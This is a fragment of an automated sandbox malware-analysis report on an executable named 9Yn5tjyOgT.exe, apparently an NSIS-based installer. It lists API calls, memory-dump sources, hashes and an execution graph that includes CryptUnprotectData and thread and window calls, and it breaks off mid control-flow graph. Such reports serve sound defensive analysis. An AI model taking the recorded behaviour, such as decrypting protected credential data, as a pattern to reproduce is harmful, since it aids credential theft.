                                                                                                                    • Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE
                                                                                                                    APIs
                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00405A07
                                                                                                                    Strings
                                                                                                                    • Error launching installer, xrefs: 004059E4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                                    • String ID: Error launching installer
                                                                                                                    • API String ID: 3712363035-66219284
                                                                                                                    • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                                    • Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
                                                                                                                    • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                                    • Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C
                                                                                                                    APIs
                                                                                                                    • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76232EE0,00403A1A,76233420,00403819,00000006,?,00000006,00000008,0000000A), ref: 00403A5D
                                                                                                                    • GlobalFree.KERNEL32(?), ref: 00403A64
                                                                                                                    Strings
                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A55
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Free$GlobalLibrary
                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                    • API String ID: 1100898210-3936084776
                                                                                                                    • Opcode ID: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                                                                                    • Instruction ID: 7abb624b42f0eb5bf3103b67fd66c27476adae564a61ccebc81435f3e7eba37d
                                                                                                                    • Opcode Fuzzy Hash: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                                                                                    • Instruction Fuzzy Hash: 73E0EC326111205BC6229F59AD44B5E776D6F58B22F0A023AE8C07B26087745D938F98
                                                                                                                    APIs
                                                                                                                    • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402F9C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\9Yn5tjyOgT.exe,C:\Users\user\Desktop\9Yn5tjyOgT.exe,80000000,00000003), ref: 00405D0F
                                                                                                                    • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F9C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\9Yn5tjyOgT.exe,C:\Users\user\Desktop\9Yn5tjyOgT.exe,80000000,00000003), ref: 00405D1F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CharPrevlstrlen
                                                                                                                    • String ID: C:\Users\user\Desktop
                                                                                                                    • API String ID: 2709904686-3125694417
                                                                                                                    • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                                                    • Instruction ID: 65148869c9b5617484fe42b3676c909fd92059a2a8224d2a454660f99163d925
                                                                                                                    • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                                                    • Instruction Fuzzy Hash: A3D0A7B7410920EAD3126B04DC04D9F73ACEF51300B46843BE840A7171D7785CD18BEC
                                                                                                                    APIs
                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 738E116A
                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 738E11C7
                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 738E11D9
                                                                                                                    • GlobalFree.KERNEL32(?), ref: 738E1203
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2811879470.00000000738E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 738E0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2811849731.00000000738E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2811957570.00000000738E4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2812015914.00000000738E6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_738e0000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$Free$Alloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1780285237-0
                                                                                                                    • Opcode ID: 14cb3dc70898e796981f109c79c513845c5d4a7896963f1928aac03d44118df3
                                                                                                                    • Instruction ID: 08d0dbc429dbc5cfb55bbba080ef557fb970169241b9c3f92c7d7ca4d92ed060
                                                                                                                    • Opcode Fuzzy Hash: 14cb3dc70898e796981f109c79c513845c5d4a7896963f1928aac03d44118df3
                                                                                                                    • Instruction Fuzzy Hash: 5D31E4B6580205AFE300EFFACC45B2977FAEB0671271442A9F94AD7240E734D900C7A0
                                                                                                                    APIs
                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                                    • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
                                                                                                                    • CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 190613189-0
                                                                                                                    • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                                    • Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
                                                                                                                    • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                                    • Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:12.7%
                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                    Signature Coverage:3%
                                                                                                                    Total number of Nodes:406
                                                                                                                    Total number of Limit Nodes:33
                                                                                                                    execution_graph 45582 ad030 45583 ad048 45582->45583 45584 ad0a2 45583->45584 45590 399d02c8 45583->45590 45595 399d1bc0 45583->45595 45602 399d1bd0 45583->45602 45609 399d02b7 45583->45609 45614 399d03f8 45583->45614 45591 399d02ee 45590->45591 45593 399d1bd0 3 API calls 45591->45593 45594 399d1bc0 3 API calls 45591->45594 45592 399d030f 45592->45584 45593->45592 45594->45592 45596 399d1bfd 45595->45596 45597 399d1c2f 45596->45597 45617 399d9b38 45596->45617 45622 399d1d48 45596->45622 45632 399d1d58 45596->45632 45642 399d9b48 45596->45642 45603 399d1bfd 45602->45603 45604 399d1c2f 45603->45604 45605 399d1d58 3 API calls 45603->45605 45606 399d1d48 3 API calls 45603->45606 45607 399d9b38 2 API calls 45603->45607 45608 399d9b48 2 API calls 45603->45608 45605->45604 45606->45604 45607->45604 45608->45604 45610 399d02ee 45609->45610 45612 399d1bd0 3 API calls 45610->45612 45613 399d1bc0 3 API calls 45610->45613 45611 399d030f 45611->45584 45612->45611 45613->45611 45615 399d0407 45614->45615 45673 399d0841 45614->45673 45615->45584 45619 399d9b5c 45617->45619 45618 399d9be8 45618->45597 45647 399d9bef 45619->45647 45650 399d9c00 45619->45650 45623 399d1d66 45622->45623 45624 399d1d93 45622->45624 45629 399d1d6e 45623->45629 45630 399d1db1 CallWindowProcW 45623->45630 45631 399d1dc0 CallWindowProcW 45623->45631 45624->45623 45625 399d1d98 45624->45625 45665 399d17d0 45625->45665 45627 399d1da4 45627->45597 45628 399d1dac 45628->45597 45629->45597 45630->45628 45631->45628 45633 399d1d66 45632->45633 45634 399d1d93 45632->45634 45639 399d1d6e 45633->45639 45640 399d1db1 CallWindowProcW 45633->45640 45641 399d1dc0 CallWindowProcW 45633->45641 45634->45633 45635 399d1d98 45634->45635 45636 399d17d0 GetCurrentThreadId 45635->45636 45637 399d1da4 45636->45637 45637->45597 45638 399d1dac 45638->45597 45639->45597 45640->45638 45641->45638 45644 399d9b5c 45642->45644 45643 399d9be8 45643->45597 45645 399d9bef 2 API calls 45644->45645 45646 399d9c00 2 API calls 45644->45646 45645->45643 45646->45643 45648 399d9c11 45647->45648 45653 399db040 45647->45653 45648->45618 45651 399d9c11 45650->45651 45652 399db040 2 API calls 45650->45652 45651->45618 45652->45651 45657 399d1db1 45653->45657 45661 399d1dc0 45653->45661 45654 399db05a 45654->45648 45658 399d1e02 45657->45658 45660 399d1e09 45657->45660 45659 399d1e5a CallWindowProcW 45658->45659 45658->45660 45659->45660 45660->45654 45662 399d1e02 45661->45662 45664 399d1e09 45661->45664 45663 399d1e5a CallWindowProcW 45662->45663 45662->45664 45663->45664 45664->45654 45666 399d17db 45665->45666 45669 399d181c 45666->45669 45668 399d22f5 45668->45627 45670 399d1827 45669->45670 45671 399d2461 GetCurrentThreadId 45670->45671 45672 399d248b 45670->45672 45671->45672 45672->45668 45674 399d0856 45673->45674 45675 399d0938 10 API calls 45673->45675 45677 399d0928 45673->45677 45674->45615 45675->45674 45678 399d0948 45677->45678 45679 399d0965 45678->45679 45680 399d0980 6 API calls 45678->45680 45681 399d0970 6 API calls 45678->45681 45679->45674 45680->45679 45681->45679 45189 15b158 45190 15b174 45189->45190 45199 36b80198 45190->45199 45205 36b80188 45190->45205 45191 15b1a3 45211 3958bd48 45191->45211 45200 36b801a4 45199->45200 45227 36b803af 45200->45227 45201 36b801b0 45235 36b8c638 45201->45235 45202 36b801da 45202->45191 45206 36b801a4 45205->45206 45210 36b803af 4 API calls 45206->45210 45207 36b801b0 45209 36b8c638 3 API calls 45207->45209 45208 36b801da 45208->45191 45209->45208 45210->45207 45212 3958bd54 45211->45212 45291 3958bd98 45212->45291 45215 399d2730 45216 399d273f 45215->45216 45356 399d0938 45216->45356 45221 399d2720 45222 399d273f 45221->45222 45223 399d0938 10 API calls 45222->45223 45224 399d2746 45223->45224 45225 399d188c 16 API calls 45224->45225 45226 15b1b1 45225->45226 45228 36b80393 45227->45228 45229 36b803ba 45227->45229 45228->45201 45230 36b804ae 45229->45230 45241 36b87848 45229->45241 45247 36b87628 45229->45247 45251 36b87c2c 45229->45251 45257 36b8761a 45229->45257 45230->45201 45236 36b8c66a 45235->45236 45237 36b8caf9 45236->45237 45238 36b87848 2 API calls 45236->45238 45237->45202 45239 36b8c77c 45238->45239 45239->45237 45263 36b8cf01 45239->45263 45243 36b87879 45241->45243 45242 36b879d9 45242->45230 45243->45242 45244 36b87c24 LdrInitializeThunk 45243->45244 45246 36b87628 LdrInitializeThunk 45243->45246 45244->45242 45246->45243 45248 36b8763a 45247->45248 45250 36b8763f 45247->45250 45248->45230 45249 36b87d69 LdrInitializeThunk 45249->45248 45250->45248 45250->45249 45255 36b87ae3 45251->45255 45252 36b87c24 LdrInitializeThunk 45254 36b87d81 45252->45254 45254->45230 45255->45252 45256 36b87628 LdrInitializeThunk 45255->45256 45256->45255 45258 36b8763a 45257->45258 45262 36b8763f 45257->45262 45258->45230 45259 36b87c24 LdrInitializeThunk 45259->45258 45261 36b87628 LdrInitializeThunk 45261->45262 45262->45258 45262->45259 45262->45261 45264 36b8cf10 45263->45264 45268 36b8d550 45264->45268 45276 36b8d540 45264->45276 45265 36b8cf80 45265->45239 45269 36b8d575 45268->45269 45270 36b8d629 45268->45270 45269->45270 45274 36b8d550 CryptUnprotectData 45269->45274 45275 36b8d540 CryptUnprotectData 45269->45275 45284 36b8d730 45269->45284 45288 36b8d1ec 45270->45288 45274->45270 45275->45270 45277 36b8d575 45276->45277 45280 36b8d629 45276->45280 45277->45280 45281 36b8d730 CryptUnprotectData 45277->45281 45282 36b8d550 CryptUnprotectData 45277->45282 45283 36b8d540 CryptUnprotectData 45277->45283 45278 36b8d1ec CryptUnprotectData 45279 36b8d7f5 45278->45279 45279->45265 45280->45278 45281->45280 45282->45280 45283->45280 45285 36b8d745 45284->45285 45286 36b8d1ec CryptUnprotectData 45285->45286 45287 36b8d7f5 45286->45287 45287->45270 45289 36b8d9e0 CryptUnprotectData 45288->45289 45290 36b8d7f5 45289->45290 45290->45265 45292 3958bdb4 45291->45292 45296 3958ce50 45292->45296 45300 3958ce60 45292->45300 45293 15b1aa 45293->45215 45293->45221 45297 3958ce7c 45296->45297 45304 395894b4 45297->45304 45299 3958ce9b 45299->45293 45301 3958ce7c 45300->45301 45302 395894b4 2 API calls 45301->45302 45303 3958ce9b 45302->45303 45303->45293 45305 395894bf 45304->45305 45306 3958cf4f 45305->45306 45309 3958cf68 45305->45309 45313 3958cf30 45305->45313 45306->45299 45311 3958cf96 45309->45311 45310 3958d021 45310->45310 45311->45310 45321 395895e8 45311->45321 45314 3958cf3f 45313->45314 45317 3958cf56 45313->45317 45315 3958cf4f 45314->45315 45319 3958cf68 2 API calls 45314->45319 45320 3958cf30 2 API calls 45314->45320 45315->45306 45316 3958d021 45316->45316 45317->45316 45318 395895e8 2 API calls 45317->45318 45318->45316 45319->45315 45320->45315 45322 395895f3 45321->45322 45324 3958ec47 45322->45324 45325 3958e7f4 45322->45325 45324->45310 45326 3958e7ff 45325->45326 45327 3958f111 45326->45327 45330 3958fab0 45326->45330 45335 3958faa1 45326->45335 45327->45324 45331 3958fadb 45330->45331 45332 3958fb8a 45331->45332 45340 399d00b0 45331->45340 45344 399d00c0 45331->45344 45336 3958fadb 45335->45336 45337 3958fb8a 45336->45337 45338 399d00b0 2 API calls 45336->45338 45339 399d00c0 2 API calls 45336->45339 45338->45337 45339->45337 45348 399d0104 45340->45348 45352 399d0110 45340->45352 45345 399d00f5 45344->45345 45346 399d0104 CreateWindowExW 45344->45346 45347 399d0110 CreateWindowExW 45344->45347 45345->45332 45346->45345 45347->45345 45349 399d0178 CreateWindowExW 45348->45349 45351 399d0234 45349->45351 45353 399d0178 CreateWindowExW 45352->45353 45355 399d0234 45353->45355 45357 399d0948 45356->45357 45358 399d0965 45357->45358 45365 399d0970 45357->45365 45377 399d0980 45357->45377 45361 399d188c 45358->45361 45363 399d1897 45361->45363 45364 399d2866 45363->45364 45399 399d1934 45363->45399 45366 399d09c6 GetCurrentProcess 45365->45366 45368 399d0a18 GetCurrentThread 45366->45368 45369 399d0a11 45366->45369 45370 399d0a4e 45368->45370 45371 399d0a55 GetCurrentProcess 45368->45371 45369->45368 45370->45371 45372 399d0a8b 45371->45372 45389 399d0f31 45372->45389 45391 399d0b4f 45372->45391 45373 399d0ab3 GetCurrentThreadId 45374 399d0ae4 45373->45374 45374->45358 45378 399d09c6 GetCurrentProcess 45377->45378 45380 399d0a18 GetCurrentThread 45378->45380 45382 399d0a11 45378->45382 45381 399d0a55 GetCurrentProcess 45380->45381 45384 399d0a4e 45380->45384 45383 399d0a8b 45381->45383 45382->45380 45387 399d0b4f 2 API calls 45383->45387 45388 399d0f31 45383->45388 45384->45381 45385 399d0ab3 GetCurrentThreadId 45386 399d0ae4 45385->45386 45386->45358 45387->45385 45388->45385 45390 399d0f4e 45389->45390 45390->45373 45395 399d0bc8 DuplicateHandle 45391->45395 45397 399d0bc0 DuplicateHandle 45391->45397 45392 399d0b8e 45392->45373 45396 399d0c5e 45395->45396 45396->45392 45398 399d0c5e 45397->45398 45398->45392 45401 399d193f 45399->45401 45400 399d2e79 45402 399d2ea9 45400->45402 45404 399d2ac4 11 API calls 45400->45404 45401->45400 45406 399d2ed4 45401->45406 45411 399d3e40 45401->45411 45416 399d3e32 45401->45416 45402->45406 45421 399d2ac4 45402->45421 45404->45402 45405 399d2ec1 45427 399dd608 45405->45427 45434 399dd5f8 45405->45434 45406->45363 45412 399d3e61 45411->45412 45413 399d3e85 45412->45413 45441 399d3ff0 45412->45441 45447 399d3fe0 45412->45447 45413->45400 45417 399d3e61 45416->45417 45418 399d3e85 45417->45418 45419 399d3ff0 12 API calls 45417->45419 45420 399d3fe0 12 API calls 45417->45420 45418->45400 45419->45418 45420->45418 45422 399d2acf 45421->45422 45423 399d0938 10 API calls 45422->45423 45426 399dd0a1 45422->45426 45424 399dd0bb 45423->45424 45550 399dc544 45424->45550 45426->45405 45433 399dd66d 45427->45433 45428 399dd899 45429 399d0938 10 API calls 45428->45429 45431 399dd6ba 45429->45431 45430 399ddad0 WaitMessage 45430->45433 45431->45406 45433->45428 45433->45430 45433->45431 45557 399dc60c 45433->45557 45435 399dd66d 45434->45435 45436 399dd899 45435->45436 45438 399dd6ba 45435->45438 45439 399ddad0 WaitMessage 45435->45439 45440 399dc60c DispatchMessageW 45435->45440 45437 399d0938 10 API calls 45436->45437 45437->45438 45438->45406 45439->45435 45440->45435 45446 399d3ffd 45441->45446 45442 399d0938 10 API calls 45443 399d402b 45442->45443 45444 399d4036 45443->45444 45453 399d2bec 45443->45453 45444->45413 45446->45442 45448 399d3ffd 45447->45448 45449 399d0938 10 API calls 45448->45449 45450 399d402b 45449->45450 45451 399d4036 45450->45451 45452 399d2bec 12 API calls 45450->45452 45451->45413 45452->45451 45454 399d2bf7 45453->45454 45456 399d40a8 45454->45456 45457 399d2c20 45454->45457 45456->45456 45458 399d2c2b 45457->45458 45470 399d2c30 45458->45470 45460 399d4517 45477 399d40f8 45460->45477 45462 399d4540 45482 399d4108 45462->45482 45465 399d4551 45465->45456 45471 399d2c3b 45470->45471 45521 399d6bf0 45471->45521 45525 399d6c00 45471->45525 45472 399d57a0 45472->45460 45473 399d3e40 12 API calls 45473->45472 45474 399d5728 45474->45472 45474->45473 45480 399d4103 45477->45480 45479 399d89d3 45479->45462 45481 399d89d8 45480->45481 45533 399d8308 45480->45533 45481->45462 45483 399d4113 45482->45483 45484 399d901f 45483->45484 45485 399d8400 2 API calls 45483->45485 45537 399d6e88 45484->45537 45485->45484 45487 399d4547 45488 399d9067 45487->45488 45498 399d91d8 45487->45498 45505 399d91f0 45487->45505 45511 399d8400 45487->45511 45489 399d9076 45488->45489 45490 399d91c8 45489->45490 45491 399d6e88 2 API calls 45489->45491 45490->45465 45495 399d910f 45491->45495 45492 399d91ea 45494 399d922d 45492->45494 45496 3958fab0 2 API calls 45492->45496 45497 3958faa1 2 API calls 45492->45497 45493 399d8400 2 API calls 45493->45495 45494->45465 45495->45492 45495->45493 45496->45494 45497->45494 45499 399d915d 45498->45499 45501 399d91ea 45498->45501 45499->45498 45500 399d8400 2 API calls 45499->45500 45500->45499 45502 399d922d 45501->45502 45503 3958fab0 2 API calls 45501->45503 45504 3958faa1 2 API calls 45501->45504 45502->45465 45503->45502 45504->45502 45507 399d9221 45505->45507 45508 399d9321 45505->45508 45506 399d922d 45506->45465 45507->45506 45509 3958fab0 2 API calls 45507->45509 45510 3958faa1 2 API calls 45507->45510 45508->45465 45509->45508 45510->45508 45512 399d840b 45511->45512 45513 399d91c8 45512->45513 45514 399d6e88 2 API calls 45512->45514 45513->45465 45516 399d910f 45514->45516 45515 399d8400 2 API calls 45515->45516 45516->45515 45517 399d91ea 45516->45517 45518 399d922d 45517->45518 45519 3958fab0 2 API calls 45517->45519 45520 3958faa1 2 API calls 45517->45520 45518->45465 45519->45518 45520->45518 45522 399d6c0a 45521->45522 45529 399d6db8 45522->45529 45526 399d6c0a 45525->45526 45528 399d6db8 2 API calls 45526->45528 45527 399d6c3e 45527->45474 45528->45527 45531 399d6e88 CreateWindowExW CreateWindowExW 45529->45531 45532 399d6e77 CreateWindowExW CreateWindowExW 45529->45532 45530 399d6c3e 45530->45474 45531->45530 45532->45530 45534 399d8313 45533->45534 45535 399d8b55 45534->45535 45536 399d4108 2 API calls 45534->45536 45535->45479 45536->45535 45539 399d6ec0 45537->45539 45540 399d6f15 45539->45540 45541 399d722f 45539->45541 45549 399d6fa0 CreateWindowExW CreateWindowExW 45539->45549 45540->45487 45542 399d4108 2 API calls 45541->45542 45543 399d7382 45541->45543 45544 399d7447 45541->45544 45542->45544 45543->45487 45544->45543 45545 399d6c00 2 API calls 45544->45545 45546 399d7658 45545->45546 45547 399d6c00 2 API calls 45546->45547 45548 399d767c 45546->45548 45547->45548 45549->45541 45552 399dc54f 45550->45552 45551 399dd3bb 45551->45426 45552->45551 45554 399dc560 45552->45554 45555 399dd3f0 OleInitialize 45554->45555 45556 399dd454 45555->45556 45556->45551 45558 399de708 DispatchMessageW 45557->45558 45559 399de774 45558->45559 45559->45433 45560 399db070 45561 399db080 45560->45561 45564 399da094 45561->45564 45565 399da09f 45564->45565 45568 399da1a4 45565->45568 45569 399da1af 45568->45569 45570 399d6c00 2 API calls 45569->45570 45575 399db099 45569->45575 45571 399db410 45570->45571 45572 399d6c00 2 API calls 45571->45572 45573 399db429 45572->45573 45574 399d6c00 2 API calls 45573->45574 45573->45575 45574->45575 45682 399d20c0 45685 399d20ed 45682->45685 45683 399d213c 45683->45683 45685->45683 45686 399d17fc 45685->45686 45687 399d1807 45686->45687 45688 399d229c 45687->45688 45689 399d17d0 GetCurrentThreadId 45687->45689 45691 395895e8 2 API calls 45688->45691 45693 3958ec1a 45688->45693 45689->45688 45690 399d22a5 45690->45683 45691->45690 45694 3958ec3a 45693->45694 45696 3958ec47 45693->45696 45695 3958e7f4 2 API calls 45694->45695 45694->45696 45695->45696 45696->45690 45697 399d2020 SetTimer 45698 399d208c 45697->45698 45576 36b87ef6 45577 36b87f0a 45576->45577 45579 36b87f25 45576->45579 45578 36b87628 LdrInitializeThunk 45577->45578 45577->45579 45581 36b882a6 45577->45581 45578->45581 45580 36b87628 LdrInitializeThunk 45580->45581 45581->45579 45581->45580

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 919 36b87628-36b87638 920 36b8763a 919->920 921 36b8763f-36b8764b 919->921 922 36b8776b-36b87775 920->922 924 36b8764d 921->924 925 36b87652-36b87667 921->925 924->922 928 36b8777b-36b877bb call 36b815c8 925->928 929 36b8766d-36b87678 925->929 945 36b877c2-36b87877 call 36b815c8 call 36b814c0 928->945 932 36b8767e-36b87685 929->932 933 36b87776 929->933 935 36b876b2-36b876bd 932->935 936 36b87687-36b8769e 932->936 933->928 940 36b876ca-36b876d4 935->940 941 36b876bf-36b876c7 935->941 936->945 946 36b876a4-36b876a7 936->946 951 36b876da-36b876e4 940->951 952 36b8775e-36b87763 940->952 941->940 979 36b87879 945->979 980 36b8787e-36b87914 call 36b81568 945->980 946->933 950 36b876ad-36b876b0 946->950 950->935 950->936 951->933 957 36b876ea-36b87706 951->957 952->922 962 36b87708 957->962 963 36b8770a-36b8770d 957->963 962->922 964 36b8770f-36b87712 963->964 965 36b87714-36b87717 963->965 968 36b8771a-36b87728 964->968 965->968 968->933 973 36b8772a-36b87731 968->973 973->922 974 36b87733-36b87739 973->974 974->933 976 36b8773b-36b87740 974->976 976->933 977 36b87742-36b87755 976->977 977->933 982 36b87757-36b8775a 977->982 979->980 986 36b879b3-36b879b9 980->986 982->974 984 36b8775c 982->984 984->922 987 36b87919-36b8792c 986->987 988 36b879bf-36b879d7 986->988 989 36b8792e 987->989 990 36b87933-36b87984 987->990 991 36b879d9-36b879e6 988->991 992 36b879eb-36b879fe 988->992 989->990 1010 36b87986-36b87994 990->1010 1011 36b87997-36b879a9 990->1011 995 36b87d81-36b87e7f 991->995 993 36b87a00 992->993 994 36b87a05-36b87a21 992->994 993->994 997 36b87a28-36b87a4c 994->997 998 36b87a23 994->998 1000 36b87e81-36b87e86 call 36b81568 995->1000 1001 36b87e87-36b87e91 995->1001 1006 36b87a4e 997->1006 1007 36b87a53-36b87a85 997->1007 998->997 1000->1001 1006->1007 1016 36b87a8c-36b87ace 1007->1016 1017 36b87a87 1007->1017 1010->988 1013 36b879ab 1011->1013 1014 36b879b0 1011->1014 1013->1014 1014->986 1019 36b87ad0 1016->1019 1020 36b87ad5-36b87ade 1016->1020 1017->1016 1019->1020 1021 36b87d06-36b87d0c 1020->1021 1022 36b87d12-36b87d25 1021->1022 1023 36b87ae3-36b87b08 1021->1023 1026 36b87d2c-36b87d47 1022->1026 1027 36b87d27 1022->1027 1024 36b87b0a 1023->1024 1025 36b87b0f-36b87b46 1023->1025 1024->1025 1035 36b87b48 1025->1035 1036 36b87b4d-36b87b7f 1025->1036 1028 36b87d49 1026->1028 1029 36b87d4e-36b87d62 1026->1029 1027->1026 1028->1029 1032 36b87d69-36b87d7f LdrInitializeThunk 1029->1032 1033 36b87d64 1029->1033 1032->995 1033->1032 1035->1036 1038 36b87b81-36b87ba6 1036->1038 1039 36b87be3-36b87bf6 1036->1039 1040 36b87ba8 1038->1040 1041 36b87bad-36b87bdb 1038->1041 1042 36b87bf8 1039->1042 1043 36b87bfd-36b87c22 1039->1043 1040->1041 1041->1039 1042->1043 1046 